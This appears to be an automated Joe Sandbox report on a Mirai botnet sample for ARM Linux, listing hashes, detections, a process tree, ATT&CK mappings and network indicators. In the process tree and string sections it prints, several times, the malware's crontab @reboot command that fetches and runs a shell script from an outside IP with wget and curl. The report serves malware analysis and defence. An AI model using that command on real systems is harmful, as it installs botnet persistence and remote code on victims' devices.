Edit tour

Linux Analysis Report
armv4l.elf

Overview

General Information

Sample name:armv4l.elf
Analysis ID:1646358
MD5:07a767893b5a40d37a82956f0c68f9f5
SHA1:38e6dbf0fd93d59c81ca89f465b63cdf069639c3
SHA256:3322b9935b9a4af99331cc75beed48f2cffbe98ae2bc6d23fffcc832ce9738e1
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:68
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "crontab" command typically for achieving persistence
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1646358
Start date and time:2025-03-23 23:07:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:armv4l.elf
Detection:MAL
Classification:mal68.troj.linELF@0/48@2/0
  • VT rate limit hit for: http://155.138.230.16/bins/bins.sh;
Command:/tmp/armv4l.elf
PID:5525
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • armv4l.elf (PID: 5525, Parent: 5445, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/armv4l.elf
    • armv4l.elf New Fork (PID: 5527, Parent: 5525)
      • sh (PID: 5537, Parent: 5527, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5539, Parent: 5537)
          • sh New Fork (PID: 5541, Parent: 5539)
          • crontab (PID: 5541, Parent: 5539, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5542, Parent: 5539)
          • chmod (PID: 5542, Parent: 5539, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5543, Parent: 5539)
          • sh (PID: 5543, Parent: 5539, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5544, Parent: 5539)
          • curl (PID: 5544, Parent: 5539, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
        • sh New Fork (PID: 5540, Parent: 5537)
        • crontab (PID: 5540, Parent: 5537, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
armv4l.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    5529.1.00007f7bec017000.00007f7bec02b000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      5525.1.00007f7bec017000.00007f7bec02b000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: armv4l.elfAvira: detected
        Source: armv4l.elfVirustotal: Detection: 33%Perma Link
        Source: armv4l.elfReversingLabs: Detection: 36%
        Source: armv4l.elfString: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv4l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetdx
        Source: armv4l.elfString: /bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
        Source: armv4l.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
        Source: /tmp/armv4l.elf (PID: 5525)Socket: 127.0.0.1:4161Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.15:48910 -> 155.138.230.16:80
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: api.znet.homes
        Source: armv4l.elfString found in binary or memory: http://155.138.230.16/bins/bins.sh;
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv4l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetdx
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/armv4l.elf (PID: 5529)SIGKILL sent: pid: 5529, result: unknownJump to behavior
        Source: classification engineClassification label: mal68.troj.linELF@0/48@2/0

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 5541)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
        Source: /bin/sh (PID: 5540)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
        Source: /bin/curl (PID: 5544)Directory: /root/.curlrcJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/110/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/231/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/111/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/112/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/233/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/113/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/114/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/235/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/115/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1333/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/116/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1695/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/117/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/118/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/119/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/911/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/914/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/10/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/917/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/11/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/12/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/13/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/14/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/15/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/16/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/17/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/18/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/19/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1591/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/120/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/121/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/122/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/243/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/2/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/123/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/3/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/124/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1588/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/125/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/4/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/246/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/126/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/5/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/127/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/6/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1585/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/128/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/7/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/129/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/8/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/800/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/9/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/802/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/803/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/804/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/20/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/21/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/3407/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/22/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/23/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/24/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/25/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/26/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/27/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/28/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/29/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1484/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/490/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/250/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/130/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/251/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/131/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/132/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/133/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1479/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/378/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/258/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/259/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/931/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1595/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/812/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/933/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/30/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/3419/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/35/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/3310/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/260/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/261/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/262/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/142/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/263/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/264/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/265/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/145/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/266/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/267/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/268/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/3303/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/269/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1486/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/1806/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/3440/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/270/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5533)File opened: /proc/271/statJump to behavior
        Source: /tmp/armv4l.elf (PID: 5537)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
        Source: /bin/sh (PID: 5542)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
        Source: /tmp/armv4l.elf (PID: 5535)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/armv4l.elf (PID: 5535)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/armv4l.elf (PID: 5525)Queries kernel information via 'uname': Jump to behavior
        Source: armv4l.elf, 5525.1.00007ffe4329b000.00007ffe432bc000.rw-.sdmp, armv4l.elf, 5529.1.00007ffe4329b000.00007ffe432bc000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/armv4l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv4l.elf
        Source: armv4l.elf, 5529.1.00007ffe4329b000.00007ffe432bc000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.0X1aDi
        Source: armv4l.elf, 5525.1.000055f850d75000.000055f850ec9000.rw-.sdmp, armv4l.elf, 5529.1.000055f850d75000.000055f850ec9000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
        Source: armv4l.elf, 5529.1.00007ffe4329b000.00007ffe432bc000.rw-.sdmpBinary or memory string: /tmp/qemu-open.0X1aDi
        Source: armv4l.elf, 5525.1.000055f850d75000.000055f850ec9000.rw-.sdmp, armv4l.elf, 5529.1.000055f850d75000.000055f850ec9000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: armv4l.elf, 5525.1.00007ffe4329b000.00007ffe432bc000.rw-.sdmp, armv4l.elf, 5529.1.00007ffe4329b000.00007ffe432bc000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: armv4l.elf, type: SAMPLE
        Source: Yara matchFile source: 5529.1.00007f7bec017000.00007f7bec02b000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5525.1.00007f7bec017000.00007f7bec02b000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: armv4l.elf, type: SAMPLE
        Source: Yara matchFile source: 5529.1.00007f7bec017000.00007f7bec02b000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5525.1.00007f7bec017000.00007f7bec02b000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid Accounts1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Virtualization/Sandbox Evasion
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Application Layer Protocol
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job2
        Scripting
        Boot or Logon Initialization Scripts1
        File and Directory Permissions Modification
        LSASS Memory1
        Virtualization/Sandbox Evasion
        Remote Desktop ProtocolData from Removable Media1
        Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Hidden Files and Directories
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646358 Sample: armv4l.elf Startdate: 23/03/2025 Architecture: LINUX Score: 68 36 api.znet.homes 155.138.230.16, 80 AS-CHOOPAUS United States 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Mirai 2->42 10 armv4l.elf 2->10         started        signatures3 process4 process5 12 armv4l.elf 10->12         started        process6 14 armv4l.elf sh 12->14         started        16 armv4l.elf 12->16         started        18 armv4l.elf 12->18         started        20 armv4l.elf 12->20         started        process7 22 sh 14->22         started        24 sh crontab 14->24         started        signatures8 27 sh crontab 22->27         started        30 sh chmod 22->30         started        32 sh sh 22->32         started        34 sh curl 22->34         started        44 Executes the "crontab" command typically for achieving persistence 24->44 process9 signatures10 46 Executes the "crontab" command typically for achieving persistence 27->46
        SourceDetectionScannerLabelLink
        armv4l.elf34%VirustotalBrowse
        armv4l.elf36%ReversingLabsLinux.Backdoor.Mirai
        armv4l.elf100%AviraEXP/ELF.Mirai.W
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://155.138.230.16/bins/bins.sh;100%Avira URL Cloudmalware

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        api.znet.homes
        155.138.230.16
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://155.138.230.16/bins/bins.sh;armv4l.elffalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          155.138.230.16
          api.znet.homesUnited States
          20473AS-CHOOPAUSfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          155.138.230.16x86_64.elfGet hashmaliciousMiraiBrowse
            armv6l.elfGet hashmaliciousMiraiBrowse
              sh4.elfGet hashmaliciousMiraiBrowse
                i686.elfGet hashmaliciousMiraiBrowse
                  mips.elfGet hashmaliciousMiraiBrowse
                    mipsel.elfGet hashmaliciousMiraiBrowse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      api.znet.homesx86_64.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      armv6l.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      sh4.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      i686.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      mips.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      mipsel.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      AS-CHOOPAUSx86_64.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      armv6l.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      sh4.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      i686.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      mips.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      mipsel.elfGet hashmaliciousMiraiBrowse
                      • 155.138.230.16
                      Setup.exeGet hashmaliciousUnknownBrowse
                      • 45.32.1.23
                      xpmg.exeGet hashmaliciousUnknownBrowse
                      • 155.138.150.12
                      courtyardhealthcare.com.exeGet hashmaliciousUnknownBrowse
                      • 139.180.160.173
                      compited.ps1Get hashmaliciousUnknownBrowse
                      • 139.180.160.173
                      No context
                      No context
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Reputation:low
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:data
                      Category:dropped
                      Size (bytes):16
                      Entropy (8bit):3.625
                      Encrypted:false
                      SSDEEP:3:Tgjv2l:Tge
                      MD5:F77D7A19D9D6E06CA54722A79A24ECFA
                      SHA1:BE5ECFC02E46FA4060B100B4DCA7CF801F990FC8
                      SHA-256:5E826286DAD2366D774C02E3EB3C8F5AF891CE07D1D32EF7640F5C7693F2C813
                      SHA-512:4F261D65D2DD740D451BA5B5A05A5CAA78100D692E1923B8BBBD44354660C616D41E6276921AE0E65AC8AC3F06A2615CBDFB32F08385E517724B70404B645E7B
                      Malicious:false
                      Reputation:low
                      Preview:/tmp/armv4l.elf.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Reputation:low
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Reputation:low
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Reputation:low
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Reputation:low
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Reputation:low
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
